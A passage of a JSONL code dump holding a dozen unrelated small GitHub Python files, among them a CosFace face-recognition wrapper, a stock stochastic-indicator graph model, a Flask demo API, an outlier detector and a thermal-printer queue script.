!= 0:\n if not test_host and not trf_host:\n # Clean up only for now when running locally\n execute(_clean_up)\n print(\"Integration Test returned \", result.return_code)\n sys.exit(result.return_code)\n\n\ndef _clean_up():\n # already in cwag test vm at this point\n # Kill uesim service\n run('pkill go', warn_only=True)\n with lcd(LTE_AGW_ROOT):\n vagrant_setup(\"magma_trfserver\", False)\n run('pkill iperf3 > /dev/null &', pty=False, warn_only=True)\n","repo_name":"fbcode/magma_old","sub_path":"cwf/gateway/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":13858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"22523118269","text":"# coding=utf-8\nimport logging\nimport os\n\nlogging.basicConfig(format='%(asctime)s %(name)s[%(process)d] %(filename)s %(lineno)d %(levelname)s %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger('')\n\nWEATHER_CODE = {\n \"AP010001\": u\"API请求参数错误。\",\n \"AP010002\": u\"没有权限访问这个API接口。在此查看你有权访问的API接口。\",\n \"AP010003\": u\"API密钥key错误。\",\n \"AP010004\": u\"签名错误。\",\n \"AP010005\": u\"你请求的API不存在。\",\n \"AP010006\": u\"没有权限访问这个地点。\",\n \"AP010007\": u\"JSONP请求需要使用签名验证方式。\",\n \"AP010008\": u\"没有绑定域名。在此绑定域名。\",\n \"AP010009\": u\"API请求的user-agent与你设置的不一致。\",\n \"AP010010\": u\"没有这个地点。\",\n \"AP010011\": u\"无法查找到指定IP地址对应的城市。\",\n \"AP010012\": u\"你的服务已经过期。在此续费。\",\n \"AP010013\": u\"访问量余额不足。联系客服购买更多访问量。\",\n \"AP010014\": u\"免费用户超过了每小时访问量额度。一小时后自动恢复。\",\n \"AP010015\": u\"暂不支持该城市的车辆限行信息。\",\n \"AP100001\": u\"系统内部错误:数据缺失。\",\n \"AP100002\": u\"系统内部错误:数据错误。\",\n \"AP100003\": u\"系统内部错误:服务内部错误。\"\n}\nWEATHER_DESC = {\n 'travel': u'旅游',\n 'uv': u'紫外线',\n 'car_washing': u'洗车',\n 'dressing': u'穿衣',\n 'sport': u'运动',\n}\n\nBAIDU_KEY = os.getenv('BAIDU_KEY')\nBAIDU_S_KEY = os.getenv('BAIDU_S_KEY')\nWEATHER_KEY = os.getenv('WEATHER_KEY')\n\nWEATHER_VOICE_FILE_PATH = '.'\nVOICE_SPEED = 3\nVOICE_VOL = 15\n","repo_name":"liuhuizdh/RaspberryPiKits","sub_path":"rpi/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43969818371","text":"from recipe import Recipe\n\nclass Book:\n\t\"\"\"\n\tBouquin qui receuille toutes les 
recettes\n\t\"\"\"\n\t\n\tnb_recette = 0 #attribut de classe\n\tlst = []\n\tdef __init__(self):\n\t\tpass\n\n\tdef add_recipe(self, nom):\n\t\tBook.lst.append(nom)\n\t\tnom = Recipe()\n\t\telem = input(\"Merci de renseigner : Niveau de 1 - 5\\Tps de prepa\\Type de repas?\\n\")\n\t\telem = elem.split()\n\t\tnom.name = nom\n\t\tnom.add_elem(elem[0], elem[1], elem[2])\n\t\tBook.nb_recette += 1\n\n\tdef print_all_recipe(self):\n\t\tfor recipe in Book.lst:\n\t\t\tprint (recipe)\n\n\tdef print_one_recipe(self, choix):\n\t\tfor recipe in Book.lst:\n\t\t\tif choix == recipe:\n\t\t\t\t#recipe = Recipe()\n\t\t\t\trecipe.print_recipe()","repo_name":"mcraipea/Bootcamp__python","sub_path":"Day_01/ex00/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4648767668","text":"import uuid\n\nimport numpy as np\nimport pytesseract\nfrom sympy import Symbol, Eq, solve, plotting, simplify\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\n\ncorrect_dict = {'—': '-', 'T': '7', 'a': 'x', '?': '^2', 'I': '2', 'r': 'x'}\ncorrect_op = ['*', '-', '+', '/', '=']\n\n\nclass MathRect:\n def __init__(self, init_coord, end_coord, image, is_simple):\n self.is_simple = is_simple\n self.init_coord = init_coord\n self.end_coord = end_coord\n self.image = image\n self.id = str(uuid.uuid4())\n self.text = pytesseract.image_to_string(image[:, :, ::-1]).rstrip()\n self.text = self._correct_text(self.text)\n if self.is_simple:\n self.unknown = self._get_unknown(self.text)\n\n self.equation = self._format_text(self.text)\n\n x = Symbol('x')\n if not is_simple:\n y = Symbol('y')\n f = Eq(eval(self.equation[0]), eval(self.equation[1]))\n self.sol = solve(f, y)\n self.sol_form = str(simplify(self.sol[0]))\n\n x = np.linspace(-100, 100, 1000)\n fig = Figure()\n canvas = FigureCanvas(fig)\n ax = fig.gca()\n ax.margins(x=0.1, y=0.1)\n ax.set_title(self.sol_form + ' = y')\n ax.plot(x, eval(self.sol_form))\n ax.grid()\n canvas.draw()\n self.plot_image = np.frombuffer(canvas.tostring_rgb(), dtype='uint8')\n size = fig.get_size_inches() * fig.dpi\n self.plot_image = self.plot_image.reshape((int(size[1]), int(size[0]), 3))\n self.sol_form = str(simplify(self.sol[0])) + ' = y'\n else:\n f = Eq(eval(self.equation[0]), eval(self.equation[1]))\n self.sol = solve(f, x)\n self.sol_form = 'x = ' + str(self.sol)\n\n def is_pt_in(self, pt):\n return self.init_coord[0] <= pt[0] <= self.end_coord[0] and self.init_coord[1] <= pt[1] <= self.end_coord[1]\n\n @staticmethod\n def _get_unknown(text):\n unknown = ''\n for c in text:\n if c in correct_op or c.isdigit():\n continue\n if unknown == '':\n unknown = c\n continue\n if c != unknown:\n print(\"Something is wrong...\", unknown, c)\n return unknown\n\n @staticmethod\n def _correct_text(text):\n new_text = \"\"\n for c in text:\n v = correct_dict.get(c)\n if v is None:\n new_text += c\n else:\n new_text += v\n return new_text.replace(' ', '')\n\n def _format_text(self, text):\n if self.is_simple:\n text = text.replace(self.unknown, 'x')\n text = text.replace('^', '**')\n unknown_idx = [i for i in range(len(text)) if text.startswith('x', i)]\n idx_offset = 0\n for idx in unknown_idx:\n idx += idx_offset\n if idx == 0 or text[idx-1] in correct_op:\n continue\n text = text[:idx] + '*' + text[idx:]\n idx_offset += 1\n if not self.is_simple:\n unknown_idx = [i for i in range(len(text)) if text.startswith('y', i)]\n 
idx_offset = 0\n for idx in unknown_idx:\n idx += idx_offset\n if idx == 0 or text[idx - 1] in correct_op:\n continue\n text = text[:idx] + '*' + text[idx:]\n idx_offset += 1\n return text.split('=')\n\n\nif __name__ == '__main__':\n m = MathRect(None, None, None, is_simple=False)\n","repo_name":"diegobonilla98/Algebra-AR-Online-Class-Helper","sub_path":"MathRect.py","file_name":"MathRect.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74973944773","text":"\"\"\"Webserver with module example.\"\"\"\nfrom aiohttp import web\nfrom aries_staticagent import Module, Connection, utils\nfrom aries_staticagent.module import ModuleRouter\nfrom common import config\n\n\nclass BasicMessageCounter(Module):\n \"\"\"A simple BasicMessage module.\n\n Responds with the number of messages received.\n \"\"\"\n\n protocol = \"https://didcomm.org/basicmessage/1.0\"\n route = ModuleRouter(protocol)\n\n def __init__(self):\n super().__init__()\n self.count = 0\n\n @route\n async def message(self, _msg, conn):\n \"\"\"Respond to basic messages with a count of messages received.\"\"\"\n self.count += 1\n await conn.send_async(\n {\n \"@type\": self.type(\"message\"),\n \"~l10n\": {\"locale\": \"en\"},\n \"sent_time\": utils.timestamp(),\n \"content\": \"{} message(s) received.\".format(self.count),\n }\n )\n\n\ndef main():\n \"\"\"Create connection and start web server.\"\"\"\n keys, target, args = config()\n conn = Connection(keys, target)\n\n bmc = BasicMessageCounter()\n conn.route_module(bmc)\n\n async def handle(request):\n \"\"\"aiohttp handle POST.\"\"\"\n await conn.handle(await request.read())\n return web.Response(status=202)\n\n app = web.Application()\n app.add_routes([web.post(\"/\", handle)])\n\n web.run_app(app, port=args.port)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hyperledger/aries-staticagent-python","sub_path":"examples/webserver_with_module.py","file_name":"webserver_with_module.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"44"} +{"seq_id":"12099179874","text":"import datetime\nfrom datetime import datetime as dt\nimport pandas\nimport psycopg2 as pg2\n\nimport math\nimport statistics\n\nimport matplotlib.pyplot as plt\nimport talib\nimport numpy as np\n\n\nfrom db import DB\n\ndb = DB()\ndb.connect()\n\nclass DataSource:\n\tdef __init__(self, params) -> None:\n\t\tself.params = params\n\t\tself.num_values = None\n\t\tself.T = []\n\t\tself.Y = []\n\n\tdef getValue(self, time):\n\t\treturn self.Y[ self.T.index(time) ]\n\t\n\tdef getValues(self, delta, start=None, end=None):\n\t\tassert( delta>0 )\n\t\tif start:\n\t\t\tst_idx = self.T.index(start)\n\t\t\treturn self.Y[ st_idx : st_idx+delta+1 ]\n\t\telif end:\n\t\t\ten_idx = self.T.index(end)\n\t\t\treturn self.Y[ en_idx-delta : en_idx+1 ]\n\n\tdef getTimes(self, delta, start=None, end=None):\n\t\tassert( delta>0 )\n\t\tif start:\n\t\t\tst_idx = self.T.index(start)\n\t\t\treturn self.T[ st_idx : st_idx+delta+1 ]\n\t\telif end:\n\t\t\ten_idx = self.T.index(end)\n\t\t\treturn self.T[ en_idx-delta : en_idx+1 ]\n\n\tdef getTrend(self, time):\n\t\traise NotImplementedError\n\nclass Vertex:\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tself.title = title\n\t\tself.source = source\n\t\tself.child = child\n\n\t\tself.description = \"\"\n\t\tself.mode2 = False\n\n\tdef getValue(self, time): # node value from -1 
to 1, +1 means sangseung yo in\n\t\treturn 0\n\n\tdef getTimeValues(self, delta, start=None, end=None): # TODO need to optimize\n\t\tassert( delta>0 )\n\t\tanysource = None\n\t\tif self.child:\n\t\t\tanysource = self.child[0].source[0] # only works for level 1\n\t\telif self.source:\n\t\t\tanysource = self.source[0]\n\t\tif start:\n\t\t\tst_idx = anysource.T.index(start)\n\t\t\tperiod = anysource.T[ st_idx : st_idx+delta+1 ]\n\t\telif end:\n\t\t\ten_idx = anysource.T.index(end)\n\t\t\tperiod = anysource.T[ en_idx-delta : en_idx+1 ]\n\t\t\n\t\tif self.mode2:\t # TODO\n\t\t\treturn [ (p, self.getValue2(p)) for p in period]\n\t\telse:\n\t\t\treturn [ (p, self.getValue(p)) for p in period]\n\n\tdef getDescription(self):\n\t\treturn self.description\n\nclass Edge:\n\tdef __init__(self, src:Vertex, dst:Vertex, title='') -> None:\n\t\tself.src = src\n\t\tself.dst = dst\n\t\tself.title = title\n\n\tdef getAnalysis(self, time):\n\t\t# return priority, value, nl\n\t\traise NotImplementedError\n\n\"\"\"\nFROM HERE\n\"\"\"\ndef timeDelta(start, delta):\n\t# input : 2020-12-01\n\tst = dt.strptime(start, \"%Y-%m-%d\")\n\tdelta = datetime.timedelta(days=delta)\n\ten = st + delta\n\treturn en.strftime(\"%Y-%m-%d\")\n\nclass TickerDataSource(DataSource):\n\tdef __init__(self, params) -> None:\n\t\tsuper().__init__(params)\n\t\tself.q = \"\"\"\n\t\t\tselect\n\t\t\t\ttime,\n\t\t\t\tclose\n\t\t\tfrom prices\n\t\t\twhere\n\t\t\t\tticker = '{}'\n\t\t\t\tand time >= '{}' and time <= '{}'\n\t\t\torder by time asc\n\t\t\"\"\"\n\t\tq = self.q.format(self.params[0], '2019-01-01', '2021-12-31')\n\t\tdata = db.query(q)\n\t\tfor d in data:\n\t\t\tself.T.append( d[0].strftime('%Y-%m-%d') )\n\t\t\tself.Y.append( d[1] )\n\nclass SlowStochDataSource(DataSource):\n\tdef __init__(self, params) -> None:\n\t\tsuper().__init__(params)\n\t\tself.q = \"\"\"\n\t\t\tselect\n\t\t\t\ttime,\n\t\t\t\thigh, low, close\n\t\t\tfrom prices\n\t\t\twhere\n\t\t\t\tticker = '{}'\n\t\t\t\tand time >= '{}' and time <= '{}'\n\t\t\torder by time asc\n\t\t\"\"\"\n\t\tq = self.q.format(self.params[0], '2019-01-01', '2021-12-31')\n\t\tdata = db.query(q)\n\t\tt = [ d[0].strftime('%Y-%m-%d') for d in data ]\n\t\th = np.array([ float(d[1]) for d in data ])\n\t\tl = np.array([ float(d[2]) for d in data ])\t\n\t\tc = np.array([ float(d[3]) for d in data ])\n\t\tslowk = talib.STOCH(h,l,c, self.params[1],self.params[2],0,self.params[3],0)[0]\n\t\tslowk = slowk[~np.isnan(slowk)]\n\t\tloss = len(h) - len(slowk)\n\t\tself.T = t[loss:]\n\t\tself.Y = slowk.tolist()\n\t\tassert(len(self.T) == len(self.Y))\n\nclass IndexDataSource(DataSource):\n\tdef __init__(self, params) -> None:\n\t\tsuper().__init__(params)\n\t\tself.q = \"\"\"\n\t\t\tselect\n\t\t\t\ttime,\n\t\t\t\tclose\n\t\t\tfrom daily_index_prices\n\t\t\twhere\n\t\t\t\tticker = '{}'\n\t\t\t\tand time >= '{}' and time <= '{}'\n\t\t\torder by time asc\n\t\t\"\"\"\n\t\tq = self.q.format(self.params[0], '2019-01-01', '2021-12-31')\n\t\tdata = db.query(q)\n\t\tfor d in data:\n\t\t\tself.T.append( d[0].strftime('%Y-%m-%d') )\n\t\t\tself.Y.append( d[1] )\n\t\t\nclass TickerVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.description = \"종목의 가격입니다.\"\n\t\tself.mode2 = True\n\n\tdef getValue(self, time):\n\t\t# diff between 1 week\n\t\tvals = self.source[0].getValues(5, end=time)\n\t\tbefore_5 = vals[0]\n\t\tnow = vals[-1]\n\t\tdiff_percent = ( (now-before_5) / before_5 ) * 100.0\n\n\t\t# to -1 1\n\t\tif diff_percent < 
0:\n\t\t\treturn max(-1, diff_percent/10 )\n\t\telif diff_percent > 0:\n\t\t\treturn min(1, diff_percent/10 )\n\t\treturn 0\n\n\tdef getValue2(self, time):\n\t\treturn self.source[0].getValue(time)\n\nclass IndexVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.description = \"종목과 관련된 지표의 가격입니다.\"\n\t\tself.mode2 = True\n\n\n\tdef getValue(self, time):\n\t\t# diff between 1 week\n\t\tvals = self.source[0].getValues(5, end=time)\n\t\tbefore_5 = vals[0]\n\t\tnow = vals[-1]\n\t\tdiff_percent = ( (now-before_5) / before_5 ) * 100.0\n\n\t\t# to -1 1\n\t\tif diff_percent < 0:\n\t\t\treturn max(-1, diff_percent/10 )\n\t\telif diff_percent > 0:\n\t\t\treturn min(1, diff_percent/10 )\n\t\treturn 0\n\t\n\tdef getValue2(self, time):\n\t\treturn self.source[0].getValue(time)\n\nclass SlowStochVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.strMap = {\n\t\t\t'periodStr': ''\n\t\t}\n\t\tself.description = \"주가의 모멘텀을 판단하는 기술적 자표입니다. 수치가 높을 시 주가가 과열, 낮을 시 침체했음을 의미합니다.\"\n\t\tif source[0].params[1] >= 5:\n\t\t\tself.strMap['periodStr'] = '단기적'\n\t\tif source[0].params[1] >= 10:\n\t\t\tself.strMap['periodStr'] = '중기적'\n\t\tif source[0].params[1] >= 20:\n\t\t\tself.strMap['periodStr'] = '장기적'\n\n\tdef getValue(self, time):\n\t\tstochval = self.source[0].getValue(time)\n\t\t# map 100 - 0 to -1 - 1 \n\t\t# 100 is overbuy, 0 is oversell\n\t\treturn (stochval / 50.0 - 1)\n\t\t\nclass MultiStochVertex(Vertex):\n\tdef __init__(self, source=None, child=None, title='') -> None:\n\t\tsuper().__init__(source, child, title)\n\t\tself.description = \"여러 시간 간격의 모멘텀을 종합적으로 판단하는 합성 지표입니다.\"\n\t\n\tdef getValue(self, time):\n\t\tv1 = self.child[0].source[0].getValue(time) # 533\n\t\tv2 = self.child[1].source[0].getValue(time) # 1066\n\t\tv3 = self.child[2].source[0].getValue(time) # 201212\n\n\t\tif v1 < 20 and v2 < 20 and v3 < 20: # down\n\t\t\treturn -1\n\t\telif v1 > 80 and v2 > 80 and v3 > 80: # up\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\t\t\nclass SlowStochTickerEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\n\tdef getAnalysis(self, time):\n\t\tvVal = self.src.source[0].getValue(time) # 0 to 100\n\t\tweight = abs(vVal-50) / 50.0\n\t\t\n\t\tnl = \"\"\n\t\tif vVal < 20:\n\t\t\tnl = \"{}으로 침체 상태입니다.\".format(self.src.strMap['periodStr'])\n\t\tif vVal >= 80:\n\t\t\tnl = \"{}으로 과열 상태입니다.\".format(self.src.strMap['periodStr'])\n\t\t# return priority, value, nl\n\t\treturn (weight, self.src.getValue(time), nl)\n\t\nclass MultiStochTickerEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\tdef getAnalysis(self, time):\n\t\tval = self.src.getValue(time)\n\t\tnl = \"\"\n\t\tweight = 0\n\t\tif val == 1:\n\t\t\tweight = 1.0\n\t\t\tnl = \"전 구간에서 과열 상태이므로 매수에 유의하는 것이 좋습니다.\"\n\t\telif val == -1:\n\t\t\tweight = 1.0\n\t\t\tnl = \"전 구간에서 침체 상태이므로 반등의 기회가 있습니다.\"\n\t\treturn(weight, val, nl)\n\nclass IndexTickerEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\nclass IndexIndexEdge(Edge):\n\tdef __init__(self, src: Vertex, dst: Vertex, title='') -> None:\n\t\tsuper().__init__(src, dst, title)\n\t\n\nif __name__ == \"__main___\":\n\tds = TickerDataSource( ('005930',) )\n\tssds = SlowStochDataSource( ('005930', 5,3,3) 
)\n","repo_name":"jinhoko-dg/citd4-2022s","sub_path":"server/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7620060878","text":"from Player import Player\nfrom Enemy import Enemy, Troll, Vampire, VampireKing\n\ntim = Player(\"Tim\")\n\nugly_troll = Troll(\"Pug\")\nprint(\"Ugly troll - {}\".format(ugly_troll))\n\nanother_troll = Troll(\"Ug\")\nprint(\"Another troll - {}\".format(another_troll, end=\"\"))\nanother_troll.take_damage(18)\nprint(another_troll)\n\nbrother_troll = Troll(\"Urg\")\nprint(\"Brother troll - {}\".format(brother_troll))\n\nugly_troll.grunt()\nanother_troll.grunt()\nbrother_troll.grunt()\n\nvamp = Vampire(\"Vlad\")\nprint(vamp)\nvamp.take_damage(5)\nprint(vamp)\n\nprint(\"-\" * 40)\nanother_troll.take_damage(30)\nprint(another_troll)\n\n# while vamp._alive:\n# vamp.take_damage(1)\n# print(vamp)\n\nvamp._lives = 0\nvamp._hit_points = 1\nprint(vamp)\n\ndracula = VampireKing(\"Dracula\")\nprint(dracula)\ndracula.take_damage(12)\nprint(dracula)\n","repo_name":"vmilkovic/python-programming-masterclass","sub_path":"Object Oriented Python/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"30037377540","text":"from flask import Flask, jsonify, request\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET'])\ndef hello():\n ''' Returns 'Hello, world' as a check of the API\n '''\n return 'Hello, world'\n\n\n@app.route('/name', methods=['GET'])\ndef my_name(name='Gabriel'):\n '''Returns creator name (Gabriel)\n '''\n return jsonify({'name': name})\n\n\n@app.route('/hello/<name>', methods=['GET'])\ndef say_hello(name='Gabriel'):\n '''Greets creator by name\n '''\n output = 'Hello there, {0}'.format(name)\n return jsonify({'message': output})\n\n\n@app.route('/distance', methods=['POST'])\ndef distance():\n '''Finds distance between two N-dimensional arrays\n '''\n try:\n from math import sqrt\n r = request.get_json()\n print(r)\n print(type(r))\n sum_dist = 0\n for n, value in enumerate(r['a']):\n sum_dist += (r['a'][n] - r['b'][n])**2\n dist = sqrt(sum_dist)\n\n return jsonify({'distance': dist, 'a': r['a'], 'b': r['b']})\n except TypeError:\n print('Numercial arrays only')\n except:\n print('Oops, something failed! 
:(')\n","repo_name":"JanIIISobieski/flask_getting_started","sub_path":"api_calls.py","file_name":"api_calls.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28027869613","text":"from sklearn.ensemble import IsolationForest\nfrom sklearn.covariance import EllipticEnvelope\nfrom sklearn.neighbors import LocalOutlierFactor\n\n\nclass OutlierDetector:\n def __init__(self, method='isolation_forest'):\n if method == 'iForest':\n self.method = IsolationForest()\n elif method == 'MCD':\n self.method = EllipticEnvelope()\n elif method == 'LOF':\n self.method = LocalOutlierFactor()\n else:\n raise ValueError(f\"Method: '{method}' is not supported.\")\n\n def detect_outliers(self, x):\n if x.shape[0] > 0:\n y_hat = self.method.fit_predict(X=x)\n outliers_idx = [i for i, y in enumerate(y_hat) if y == -1]\n else:\n outliers_idx = list()\n\n return outliers_idx\n","repo_name":"CamiloGuillen/Normalizing_Houston_Kinetic_Dataset","sub_path":"clean_dataset/outlier_detector.py","file_name":"outlier_detector.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27433608263","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom Adafruit_Thermal import *\nimport requests\nimport json\n\nprinter = Adafruit_Thermal(\"/dev/ttyS0\", 19200, timeout=5)\n\nurl = \"https://api.mlab.com/api/1/databases/krpyl/collections/queue\"\nkey = \"?apiKey=\"\n\n# insertData = json.loads('{\"data\":[\"sdcsd\",\"dsdfsdfsd\",\"fsdfsdf\"]}')\n# print(\"Data Inserted\")\n# insert = requests.post(url+key,json=insertData)\nresponse = requests.get(url+key)\n# print(response.content)\n\n\nif response.status_code == 200 :\n data = json.loads(response.content)\n result = data[0][\"data\"]\n id = data[0][\"_id\"][\"$oid\"]\n response = requests.delete(url+\"/\"+id+key)\n \n for line in result:\n if(line == '$'):\n printer.feed(1)\n else:\n printer.println(line)\n\n response = requests.delete(url+\"/\"+id+key)\n #print(\"Deleted\")\n","repo_name":"kanadenipun/pyl","sub_path":"pyl.py","file_name":"pyl.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30073891779","text":"import os\n\nassetsExtensions = [\".mp3\", \".png\"]\nexclude = {\n \"dirs\":[\"spritesheets\"],\n \"files\":[]\n}\n\nfirstFile = True\nwith open(os.path.dirname(os.path.dirname(__file__)) + '\\\\datafiles\\\\assetsdata', 'w') as configFile:\n for root, dirs, files in os.walk(os.path.dirname(__file__)):\n pathFolders = root.split(\"\\\\\")\n if pathFolders[-1] in exclude[\"dirs\"]:\n continue\n \n for i, fld in enumerate(pathFolders):\n if fld == \"assets\":\n for file in files:\n if file not in exclude[\"files\"] and os.path.splitext(file)[1] in assetsExtensions:\n if firstFile is False:\n configFile.write(\"\\n\")\n\n firstFile = False\n configFile.write(\"/\".join(pathFolders[i:]) + f\"/{file}\")\n if len(pathFolders[i+2:]) > 0:\n configFile.write(f\"~{'/'.join(pathFolders[i+2:]) + f'/{os.path.splitext(file)[0]}'}\")\n else:\n configFile.write(f\"~{os.path.splitext(file)[0]}\")\n break\n\n\"\"\"\npython config.py\n\"\"\"","repo_name":"YoAquinJs/pacman","sub_path":"assets/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} 
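The OutlierDetector record above ("clean_dataset/outlier_detector.py", seq_id 28027869613) wraps three scikit-learn estimators behind a single detect_outliers() call that returns the row indices fit_predict() labels as -1. Below is a minimal usage sketch, not part of the original repository: it assumes NumPy and scikit-learn are installed, that the class is importable from the module path given in the record, and the sample data is invented for illustration.
# Usage sketch for the OutlierDetector class defined in the record above.
# Assumptions: the import path mirrors the record's sub_path, and the data is made up.
import numpy as np
from clean_dataset.outlier_detector import OutlierDetector  # assumed import path

rng = np.random.default_rng(0)
x = rng.normal(loc=0.0, scale=1.0, size=(100, 2))  # mostly well-behaved points
x[0] = [10.0, 10.0]                                # one obvious outlier

detector = OutlierDetector(method="iForest")       # "MCD" and "LOF" are also accepted
outlier_rows = detector.detect_outliers(x)         # indices where fit_predict(X=x) == -1
print(outlier_rows)                                # row 0 should be among them
Note that the constructor's default string ('isolation_forest') does not match any of the branches it checks ('iForest', 'MCD', 'LOF'), so the method argument must be passed explicitly to avoid the ValueError raised in the else clause.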
+{"seq_id":"30051637314","text":"\"\"\"\nCreated by Alex Wang\nOn 2018-07-30\n\nModel: https://github.com/yule-li/CosFace\n\n[Configurations]:\n\tlfw_pairs: data/pairs.txt\n\tembedding_size: 1024\n\tmodel_def: models.inception_resnet_v1\n\tsave_model: False\n\tdo_flip: False\n\timage_width: 112\n\tlfw_dir: dataset/lfw-112x96\n\tprewhiten: False\n\tlfw_nrof_folds: 10\n\timage_height: 112\n\tlfw_batch_size: 200\n\timage_size: 224\n\tfc_bn: True\n\tmodel: models/model-20180626-205832.ckpt-60000\n\tnetwork_type: sphere_network\n\tlfw_file_ext: jpg\n[End of configuration]\n\"\"\"\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport cv2\nimport numpy as np\n\nimport sphere_network\nimport utils\n\nimage_width = 112\nimage_height = 112\nembedding_size = 1024\n# face_threshold = 1.49\n# face_threshold = 1.54\nface_threshold = 0.95\nface_combine_threshold = 0.7\nsave_threshold_min = 0.5\nsave_threshold_max = 0.7\n\n\nclass CosFace(object):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, weight_file):\n config = tf.ConfigProto(log_device_placement=False)\n config.gpu_options.allow_growth = True\n\n self.__graph = tf.Graph()\n\n with self.__graph.as_default():\n self.__session = tf.Session(config=config, graph=self.__graph)\n\n self.images_placeholder = tf.placeholder(tf.float32, shape=(\n None, image_height, image_width, 3), name='image')\n self.phase_train_placeholder = tf.placeholder(tf.bool, name='phase_train')\n\n prelogits = sphere_network.infer(self.images_placeholder, embedding_size)\n\n prelogits = slim.batch_norm(prelogits,\n is_training=self.phase_train_placeholder,\n epsilon=1e-5,\n scale=True,\n scope='softmax_bn')\n\n self.embeddings = tf.identity(prelogits)\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=3)\n saver.restore(self.__session, weight_file)\n\n def infer(self, images, do_flip=False):\n \"\"\"\n\n :param images: utils.py-->load_data\n rgb format\n resize to (image_height, image_width, 3)\n img = img - 127.5\n img = img / 128.\n :return:\n \"\"\"\n feed_dict = {self.images_placeholder: images, self.phase_train_placeholder: False}\n feats = self.__session.run(self.embeddings, feed_dict=feed_dict)\n if do_flip:\n images_flip = [np.fliplr(image) for image in images]\n feed_dict_flip = {self.images_placeholder: images_flip, self.phase_train_placeholder: False}\n feats_flip = self.__session.run(self.embeddings, feed_dict=feed_dict_flip)\n feats = np.concatenate((feats, feats_flip), axis=1)\n feats = utils.l2_normalize(feats)\n return feats\n\n def data_preprocess(self, image):\n \"\"\"\n :param image: opencv bgr image\n :return:\n \"\"\"\n img_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n height, width = img_rgb.shape[0:2]\n img_new = np.zeros((image_height, image_width, 3), dtype=np.float64)\n ratio = min(image_height * 1.0 / height, image_width * 1.0 / width)\n new_height, new_width = int(height * ratio), int(width * ratio)\n height_offset, width_offset = (image_height - new_height) //2, (image_width - new_width) // 2\n img_rgb = cv2.resize(img_rgb, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n img_rgb = img_rgb.astype(np.float64)\n img_new[height_offset: height_offset + new_height, width_offset: width_offset + new_width, :] = img_rgb\n\n # img_new = cv2.resize(img_rgb, (image_height, image_width), interpolation=cv2.INTER_CUBIC)\n # img_new = img_new.astype(np.float64)\n img_new -= 127.5\n img_new /= 128.\n return img_new\n\n def face_dist(self, embedding_one, embedding_two):\n diff = np.subtract(embedding_one, embedding_two)\n dist = 
np.sum(np.square(diff))\n return dist\n\n def face_dist_multiple(self, embeddings_one, embeddings_two):\n diff = np.subtract(embeddings_one, embeddings_two)\n dist = np.sum(np.square(diff), 1)\n return dist\n\n def __del__(self):\n self.__session.close()\n","repo_name":"alexwongdl/PythonTemplate","sub_path":"experience/face/cosface_recognition/cosface_wrapper.py","file_name":"cosface_wrapper.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24394793273","text":"import sys\nimport os\n\n\nif __name__ == '__main__':\n # Remove the current working directory from sys.path for Python 3.7+\n # because since that version it's added by default to sys.path when\n # using 'python -m'.\n if sys.version_info[0] == 3 and sys.version_info[1] >= 7:\n cwd = os.getcwd()\n if cwd in sys.path:\n sys.path.remove(cwd)\n\n from spyder_kernels.console import start\n try:\n start.main()\n except Exception:\n # We have to explicitely write to __stderr__ as stderr might already\n # have been replaced.\n import traceback\n traceback.print_exc(file=sys.__stderr__)\n sys.__stderr__.flush()\n 